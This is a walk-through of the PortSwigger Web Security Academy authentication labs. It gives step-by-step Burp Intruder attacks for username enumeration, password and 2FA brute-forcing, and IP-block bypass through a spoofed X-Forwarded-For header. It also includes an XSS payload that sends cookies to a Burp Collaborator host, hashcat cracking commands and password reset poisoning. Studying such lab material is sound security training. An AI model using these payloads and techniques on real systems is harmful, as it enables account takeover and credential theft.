Walk-through of the Authentication lab on PortSwigger Web Security Academy.
- Apprentice – Username enumeration via different responses
- Apprentice – 2FA simple bypass
- Apprentice – Password reset broken logic
- Practitioner – Username enumeration via subtly different responses
- Practitioner – Username enumeration via response timing
- Practitioner – Broken brute-force protection, IP block
- Practitioner – Username enumeration via account lock
- Practitioner – 2FA broken logic
- Practitioner – Brute-forcing a stay-logged-in cookie
- Practitioner – Offline password cracking
- Practitioner – Password reset poisoning via middleware
- Practitioner – Password brute-force via password change
- Expert – Broken brute-force protection, multiple credentials per request
- Expert – 2FA bypass using a brute-force attack
Apprentice – Username enumeration via different responses
Use these lists for usernames and passwords.
- Click on My account and enter a user and password. A message will say Invalid username.
- Send the request to the Intruder module.
POST /login HTTP/1.1
...
username=whatever&password=whatever
Make the username the varying part.
username=§whatever§&password=whatever
- In the Payloads tab, paste the content of this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username.
- Click Start attack.
Click on column Invalid username to order it. Username arlington is not flagged.
username=arlington&password=whatever
Go back to the Positions tab and change the varying part to the password. Set username as arlington.
username=arlington&password=§whaterver§
- In the Payloads tab, clear the list. Paste content from this list.
- In the Options tab, under Grep – Match, clear the list and add Incorrect password.
- Click Start attack.
Click on column Incorrect password to order it. Password freedom is not flagged.
username=arlington&password=freedom
Click on My account and enter credentials arlington/freedom to solve the lab.
Apprentice – 2FA simple bypass
- Click on My account and enter credentials carlos/montoya.
- This redirects to /login2, asking for a 4-digit security code. However, the session cookie is set.
- Remove /login2 from the URL. The user is logged in…
Apprentice – Password reset broken logic
- Click on My account and then on Forgot Password?. Enter user wiener.
- Click on My account and enter credentials wiener/peter. You will get the email address of the user.
- Click on Email client.
https://<YOUR LAB ID>.web-security-academy.net/forgot-password?temp-forgot-password-token=<token>
Access the URL to the password reset and intercept requests.
POST /forgot-password?temp-forgot-password-token=<token> HTTP/1.1
...
temp-forgot-password-token=<token>&username=wiener&new-password-1=peter&new-password-2=peter
The username is in the parameters… change it to carlos and forward the request.
temp-forgot-password-token=<token>&username=carlos&new-password-1=peter&new-password-2=peter
Log out of the application. Click on My account and log in with credentials carlos/peter.
Practitioner – Username enumeration via subtly different responses
Use these lists for usernames and passwords.
- Click on My account and enter a user and password. A message will say Invalid username or password. (ending with a dot).
- Send the request to the Intruder module.
POST /login HTTP/1.1
...
username=whatever&password=whatever
Make the username the varying part.
username=§whatever§&password=whatever
- In the Payloads tab, paste the content of this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username or password. (ending with a dot).
- Click Start attack.
Click on column Invalid username or password. to order it. Username pi is not flagged.
username=pi&password=whatever
Go back to the Positions tab and change the varying part to the password. Set username as pi.
username=pi&password=§whatever§
- In the Payloads tab, clear the list. Paste content from this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username or password (NOT ending with a dot).
- Click Start attack.
Click on column Invalid username or password to order it. Password matthew is not flagged.
username=pi&password=matthew
Click on My account and enter credentials pi/matthew to solve the lab.
Practitioner – Username enumeration via response timing
Use these lists for usernames and passwords.
- Click on My account and enter a user and password. A message will say Invalid username or password. (ending with a dot).
- Send the request to the Intruder module.
POST /login HTTP/1.1
...
username=whatever&password=whatever
The IP gets blocked after a few tries.
Make the username the varying part and use a very long password (100 characters) to increase the processing delay. Add the X-Forwarded-For HTTP header to bypass the IP filter.
X-Forwarded-For: §dummy§
username=§whatever§&password=0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
Set Attack type to Pitchfork (multiple payloads).
Payload 1 (X-Forwarded-For) for spoofing IP
- In the Payloads tab, select Payload set “1” and select Numbers.
- Set range From 1 To 100, Step to 1, Max fraction digits to 0.
Payload 2 (username)
- In the Payloads tab, select Payload set “2” and add user wiener.
- Paste the content of this list.
- Use a Resource pool with 1 maximum concurrent requests.
- Click Start attack.
- In the attack window, click on the Columns menu, then on Response received and Response completed.
- Order column Response received.
Users azureuser and wiener have a Response received of 1120+, in comparison with other requests around 300.
Bruteforce password
Using the same request in the Intruder module, set username to azureuser and make the password the varying part. Leave the X-Forwarded-For header.
X-Forwarded-For: §dummy§
username=azureuser&password=§whatever§
- In the Payloads tab, select Payload set “2” and paste the content of this list.
- In the Options tab, under Grep – Match, clear the list and add Invalid username or password. (ending with a dot).
- Click Start attack.
Click on column Invalid username or password. to order it. Password moon is not flagged.
username=azureuser&password=moon
Click on My account and enter credentials azureuser/moon to solve the lab.
Practitioner – Broken brute-force protection, IP block
- Click on My account and enter user carlos and any password. A message will say Incorrect password.
- Send the failed login request to the Intruder module.
POST /login HTTP/1.1
...
username=carlos&password=whatever
Make the username the varying part.
username=carlos&password=§whatever§
- In the Payloads tab, paste the content of this list.
- Use a resource pool of 1 maximum concurrent request.
- Click Start attack.
You will get the message You have made too many incorrect login attempts. Please try again in 1 minute(s) after 3 failed login requests. Click on My account and enter credentials wiener/peter. It works. Log out. We can use this technique to bypass the IP blocking.
Using a macro and a session handling rule
The goal is to issue a successful login request before each bruteforce attempt.
- Click on the Settings menu.
- Under Macros, click Add.
- Select the successful login request.
- Give the macro a name (Login).
- Click OK.
- Under Setting handling rules, click Add.
- In the Details tab:
- Under Rule Description, enter a description like Intruder.
- Under Rules Actions, click Add and select Run a macro. Select the macro Login and click OK.
- In the Scope tab:
- Under Tools Scope, select Intruder and unselect the rest.
- Under URL Scope, select Include all URLs.
- Click OK.
- In the Details tab:
- Close the Settings window.
In the Intruder module, click on Start the attack (same request as before). Order the results by Status. A 302 Redirect is returned for the successful login request.
Click on My account and enter credentials carlos/asdfgh to solve the lab (password changes when doing the lab again).
Practitioner – Username enumeration via account lock
To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
- Click on My account and enter any username and password.
- Send the request to the Intruder.
- Make the username and password the varying parts.
- Set attack type to Cluster bomb.
POST /login HTTP/1.1
...
username=§whatever§&password=§whatever§
- In the Payloads tab:
- Payload set 1: use Simple list and copy this list of usernames.
- Payload set 2: use Simple list and enter numbers from 1 to 10. It will try 10 wrong passwords per username.
- In the Options tab, under Grep – Match, clear the list and add “Invalid username or password.”.
The username “application” will return this message:
You have made too many incorrect login attempts. Please try again in 1 minute(s).
- Click on My account and enter username “application” and any password.
- Send the request to the Intruder module.
- Make the password the varying part.
POST /login HTTP/1.1
...
username=application&password=§whatever§
- In the Payloads tab, use a Simple list and copy this list.
- In the Resource pool tab, use 10 concurrent requests.
- In the Options tab, under Grep – Match, clear the list and add “Invalid username or password.”.
- Start the attack.
- Order the results by Length. We find password “iloveyou”.
Wait one minute for the account to unlock and enter credentials application/iloveyou to solve the lab.
Practitioner – 2FA broken logic
To solve the lab, access Carlos’s account page. You also have access to the email server to receive your 2FA verification code
- Click on My account and log in with credentials wiener/peter.
- Enter any 4-digit security code as the second factor and click Login.
- Send the request to the Intruder module.
POST /login2 HTTP/1.1
...
Cookie: verify=wiener; session=<SESSION TOKEN>
...
mfa-code=1234
Change the username in the cookie from wiener to carlos and make the mfa-code the varying part.
POST /login2 HTTP/1.1
...
Cookie: verify=carlos; session=<SESSION TOKEN>
...
mfa-code=§1234§
- In the Payloads tab, select payload type Brute forcer, with Character set of “0123456789”, min length 4, max length 4.
- Leave the resource pool to 10 concurrent threads or it would be too long to complete.
- In the Options tab, under Grep – Match, clear the list and add “Incorrect security code”.
- We find the mfa-code.
mfa-code=0578
HTTP/1.1 302 Found
Location: /my-account
Set-Cookie: session=<SESSION TOKEN>; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0
Right-click on the response in the Intruder, Request in browser -> In original session. Copy the URL in the browser to solve the lab. You will be logged in as carlos.
Practitioner – Brute-forcing a stay-logged-in cookie
This lab allows users to stay logged in even after they close their browser session. The cookie used to provide this functionality is vulnerable to brute-forcing. To solve the lab, brute-force Carlos’s cookie to gain access to his “My account” page.
Click on My account, select the Stay logged in checkbox and log in with credentials wiener/peter. Inspect requests.
HTTP/1.1 302 Found
Location: /my-account
Set-Cookie: stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw; Expires=Wed, 01 Jan 3000 01:00:00 UTC
Set-Cookie: session=<SESSION TOKEN>; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 0
Highlight the stay-logged-in value and open the Inspector (or send to decoder). It is encoded in base 64. The first part is the username, the second part is the password MD5 hash (“peter”).
d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
wiener:51dc30ddc473d43a6011e9ebba6ca770
<username>:<password MD5 hash>
- Log out and click on My account.
- Send the request to the Intruder module.
- In the Payloads tab, use Simple list and copy this list.
- Under Payload Processing, add in this order:
- Hash:MD5
- Add Prefix: “carlos:”
- Base64-encode
- Under Payload Processing, add in this order:
- In the Options tab, under Grep – Match, clear the list and add “Your username is:”.
- Start the attack.
GET /my-account HTTP/1.1
...
Cookie: session=<SESSION TOKEN>; stay-logged-in=§changeme§
...
Request 21 works, which gives the password 123321. This is not necessary to solve the lab but would be useful during a real pentest to log in directly.
Practitioner – Offline password cracking
This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the “My account” page.
Finding the XSS
- Click on a post (View post) and Submit any comment.
- Fuzz with the parameters. The comment field is vulnerable to XSS.
POST /post/comment HTTP/1.1
...
postId=6&comment=<script>alert(1)</script>&name=whatever&email=whatever%40example.com&website=<@urlencode>http://whatever.example.com<@/urlencode>
Exploit the XSS to steal cookies
Submit one of these comments to steal the cookies:
<script>new Image().src="https://<BURP COLLABORATOR ID>.oastify.com?cookies="+document.cookie;</script>
<script>document.location='https://<BURP COLLABORATOR ID>.oastify.com?cookie='+document.cookie</script>
The Burp Collaborator receives a request.
GET /?cookies=secret=bERIRivWIH5J5JUWA8LfwybHabsoPwjr;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1
Host: ik6nd25qekzarsj70rfag69h58bzzpne.oastify.com
Connection: keep-alive
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.119 Safari/537.36
sec-ch-ua-platform:
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0aae00090467eea5c049726b006300bd.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Send the stay-logged-in cookie value in the Decode and decode with base 64.
carlos:26323c16d5f4dabff3bb136f2460a943
MD5 password hash is:
26323c16d5f4dabff3bb136f2460a943
Crack the password using Hashcat.
echo "26323c16d5f4dabff3bb136f2460a943" > hash.txt
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 0 -a 0 hash.txt --show
26323c16d5f4dabff3bb136f2460a943:onceuponatime
We found password “onceuponatime”. Click on My account and log in with credentials carlos/onceuponatime and click Delete account to solve the lab.
Practitioner – Password reset poisoning via middleware
See Password reset poisoning (PortSwigger).
This lab is vulnerable to password reset poisoning. The user carlos will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos’s account.
- Click on My account.
- Click on Forgot password.
- Enter username wiener.
- Click on Go to exploit server and on Email client.
POST /forgot-password HTTP/1.1
...
username=wiener
Hello!
Please follow the link below to reset your password.
https://<LAB ID>.web-security-academy.net/forgot-password?temp-forgot-password-token=VFch8il4tlXaoWhN7AhhVyD582ZUQF59
Thanks,
Support team
Send a Forgot password request for carlos, adding the X-Forwarded-Host header.
Do NOT add http or https in front of the Burp Collaborator URL.
POST /forgot-password HTTP/1.1
...
X-Forwarded-Host: <BURP COLLABORATOR ID>.oastify.com
username=carlos
The Burp Collaborator receives a request.
GET /forgot-password?temp-forgot-password-token=rxKkJyALoBVWQxFYhPEckYVK3nV8YwS9 HTTP/1.1
Access the URL to reset carlos’ password.
https://<LAB ID>.web-security-academy.net/forgot-password?temp-forgot-password-token=rxKkJyALoBVWQxFYhPEckYVK3nV8YwS9
Click on My account, and log in with credentials carlos/whatever.
Practitioner – Password brute-force via password change
To solve the lab, use the list of candidate passwords to brute-force Carlos’s account and access his “My account” page.
- Click on My account and log in with credentials wiener/peter.
- Enter a wrong password as the current password, and enter 2 different passwords as the new password. The application responds with “Current password is incorrect”.
- Send the request to the Repeater module.
POST /my-account/change-password HTTP/1.1
...
username=wiener¤t-password=notmypassword&new-password-1=whatever1&new-password-2=whatever2
Change the username to carlos and send the request. The application responds with “Current password is incorrect”.
POST /my-account/change-password HTTP/1.1
...
username=carlos¤t-password=notmypassword&new-password-1=whatever1&new-password-2=whatever2
- Send the request to the Intruder module.
- Make the password the varying part.
POST /my-account/change-password HTTP/1.1
...
username=carlos¤t-password=§notmypassword§&new-password-1=whatever1&new-password-2=whatever2
- In the Payloads tab, use the Simple list and copy this list.
- In the Options tab, under Grep – Match, clear the list and add “Current password is incorrect”.
- Click Start attack.
Password “monitoring” responds with “New passwords do not match”. Log in using credentials carlos/monitoring to solve the lab.
Expert – Broken brute-force protection, multiple credentials per request
To solve the lab, brute-force Carlos’s password, then access his account page.
- Click on My account and enter username carlos with any password.
- Send the request to the Repeater module.
POST /login HTTP/1.1
...
{"username":"carlos","password":"whatever"}
Modify the request so the server accepts multiple passwords.
POST /login HTTP/1.1
...
{"username":"carlos","password":["whatever1","whatever2"]}
Generate the list of passwords in JSON using this list. Put the list in wl.txt and generate the JSON.
for pass in $(cat wl.txt); do printf \"${pass}\",; done
- Intercept requests in Burp Suite.
- Click on My account and enter username carlos with any password.
- Modify the request with the multiple passwords.
- Forward the request. The server responds with a 302 Redirect.
POST /login HTTP/1.1
...
{"username":"carlos","password":["123456","password","12345678","qwerty","123456789","12345","1234","111111","1234567","dragon","123123","baseball","abc123","football","monkey","letmein","shadow","master","666666","qwertyuiop","123321","mustang","1234567890","michael","654321","superman","1qaz2wsx","7777777","121212","000000","qazwsx","123qwe","killer","trustno1","jordan","jennifer","zxcvbnm","asdfgh","hunter","buster","soccer","harley","batman","andrew","tigger","sunshine","iloveyou","2000","charlie","robert","thomas","hockey","ranger","daniel","starwars","klaster","112233","george","computer","michelle","jessica","pepper","1111","zxcvbn","555555","11111111","131313","freedom","777777","pass","maggie","159753","aaaaaa","ginger","princess","joshua","cheese","amanda","summer","love","ashley","nicole","chelsea","biteme","matthew","access","yankees","987654321","dallas","austin","thunder","taylor","matrix","mobilemail","mom","monitor","monitoring","montana","moon","moscow"]}
We are now logged as user carlos.
Expert – 2FA bypass using a brute-force attack
You have already obtained a valid username and password, but do not have access to the user’s 2FA verification code. To solve the lab, brute-force the 2FA code and access Carlos’s account page.
As the verification code will reset while you’re running your attack, you may need to repeat this attack several times before you succeed. This is because the new code may be a number that your current Intruder attack has already attempted.
- Click on My account and enter credentials carlos/montoya.
- A 4-digit security code is required. Enter any code and send the request to the Intruder module.
- Make the mfa-code the varying part.
POST /login2 HTTP/1.1
...
csrf=Kca8PZvjWjRjDyVlAmYtBvtjsGCF2ITX&mfa-code=§1234§
- In the Payloads tab, use Numbers from 0 to 9999, step 1, min/max integer digits to 4, max fraction digits to 0.
- In the Resource Pool tab, use 1 concurrent request.
- In the Options tab, under Grep – Match, clear the list and add “Incorrect security code”.
- Do NOT start the attack yet.
Create a macro
- Click on Settings.
- In Sessions, under Macros, click Add.
- Select requests: GET /login, POST /login, GET /login2
- Click OK. Click Test macro. It should return the page asking for MFA.
Create a session handling rule
- In Sessions, under Session handling rules, click Add.
- In the Details tab, under Rule actions, click Add.
- Select the macro and click OK.
- In the Scope tab, under Tools Scope, select the Intruder and unselect the others.
- Under URL Scope, select Include all URLs.
- Click OK and close the Settings menu.
Bruteforce MFA
In the Intruder, click Start attack. It will be super slow. Be patient. One request will return 302 Redirect. Right-click on the request, and click Show response in browser. You will be logged as carlos.